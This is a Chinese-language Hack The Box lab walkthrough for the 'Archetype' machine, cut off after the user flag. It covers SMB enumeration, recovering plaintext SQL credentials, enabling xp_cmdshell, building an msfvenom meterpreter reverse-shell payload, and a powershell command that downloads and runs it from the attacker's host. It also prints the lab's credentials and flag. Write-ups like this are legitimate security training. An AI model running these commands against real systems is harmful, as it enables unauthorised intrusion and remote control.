Hackthebox靶机 Archetype攻略(部分)
目标:Archetype
题目难度:本人觉得有难度
作者使用Kali Linux作为渗透测试平台,在Kali Linux上首先通过openvpn建立与Hackthebox网站的VPN连接,得到目标Archetype实例的IP地址:
#openvpn starting_point_jasonhuawen.ovpn
# nmap -sV 10.129.5.176
Task 1: Which TCP port is hosting a database server?
思路: 用nmap工具扫描一下目标Archetype,看数据库服务运行的端口即可:
# nmap -sV 10.129.5.176 255 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 00:49 EDT Nmap scan report for 10.129.175.76 Host is up (0.22s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000 Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.98 seconds
答案: 1433
Task 2: What is the name of the non-Administrative share available over SMB?
思路: 从nmap扫描结果可以知道目标运行共享服务,因此尝试用smbclient列出共享目录
# smbclient -L 10.129.5.176 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backups Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing.
# smbclient -L 10.129.5.176可以列出共享目录,以$结尾的是管理员权限
答案: backups
Task 3: What is the password identified in the file on the SMB share?
思路: 然后用smbclient登录上目标的backups目录(没有密码)
#smbclient //10.129.5.176/backups
发现只有一个文件,下载到本地,查看,就可以看到有有用户名和密码信息:
# smbclient //10.129.5.176/backups 1 ⨯ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 20 07:20:57 2020 .. D 0 Mon Jan 20 07:20:57 2020 prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020 5056511 blocks of size 4096. 2605198 blocks available smb: \> get prod.dtsConfig getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \> quit ┌──(root💀kali)-[~] └─# cat prod.dtsConfig <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration>
Username: ARCHETYPE\sql_svc
Password: M3g4c0rp123
答案:M3g4c0rp123
Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
思路: 接下来这道题,题目中提到了impacket工具,结果发现Kali Linux上没有安装,谷歌一下,安装很简单:
#git clone https://github.com/CoreSecurity/impacket.git
#cd impacket/
#python3 setup.py install
题目中是要建立与Microsoft SQL Server的连接,应该是mssqlclient.py脚本
接下来利用impacket中msclient.py脚本连接sqlserver 数据库(用户名与密码用之前smbclient下载的文件中的相关信息)
#python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
成功进入数据库
(root💀kali)-[/usr/share/doc/python3-impacket/examples] └─# ls addcomputer.py findDelegation.py getST.py lookupsid.py nmapAnswerMachine.py raiseChild.py rpcmap.py smbexec.py split.py atexec.py GetADUsers.py getTGT.py mimikatz.py ntfs-read.py rbcd.py sambaPipe.py smbpasswd.py ticketConverter.py dcomexec.py getArch.py GetUserSPNs.py mqtt_check.py ntlmrelayx.py rdp_check.py samrdump.py smbrelayx.py ticketer.py dpapi.py Get-GPPPassword.py goldenPac.py mssqlclient.py ping6.py registry-read.py secretsdump.py smbserver.py wmiexec.py esentutl.py GetNPUsers.py karmaSMB.py mssqlinstance.py ping.py reg.py services.py sniffer.py wmipersist.py exchanger.py getPac.py kintercept.py netview.py psexec.py rpcdump.py smbclient.py sniff.py wmiquery.py ┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples] └─# python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth Impacket v0.9.25.dev1+20220323.180407.ff322697 - Copyright 2021 SecureAuth Corporation Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
答案:mssqlclient.py
Task 5:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
答案: xp_cmdshell
Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
答案: winpeas(著名的windows信息枚举以发现存在的漏洞)
Task 7: What file contains the administrator's password?
思路:需要加你反向shell并提权
SQL> enable_xp_cmdshell;
SQL> reconfigure
然后是设法建立反向代理连接,需要将载荷生成并上传到目标机器,首先用msfenom生成载荷:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe #10.10.14.218是kali Linux 建立vpn连接后tun的地址,用于建立反向shell 1 ⨯ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes Saved as: jason.exe
下面关键是如何把jason.exe payload上传到目标机器
可以利用xp_cmsshell执行命令,将载荷下载到目标机器,在kali Linux本地运行http服务器(用python http模块)
首先在目标机器上进入到有执行权限的目录,比如Public目录:
成功上传载荷到目标机器:
SQL> xp_cmdshell "powershell wget http://10.10.14.8/jason.exe -OutFile c:\\Users\Public\\jason.exe"
然后在目标机器上执行脚本jason.exe
成功回连至Kali LInux
然后需要准备提权工具winPEAS,将该文件下载到Kali Linux本地
#wgethttps://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe
然后通过meterpreter将winpeas上传到目标机器,并执行:
成功获得user的flag: 3e7b102e78218e935bf3f4951fec21a3
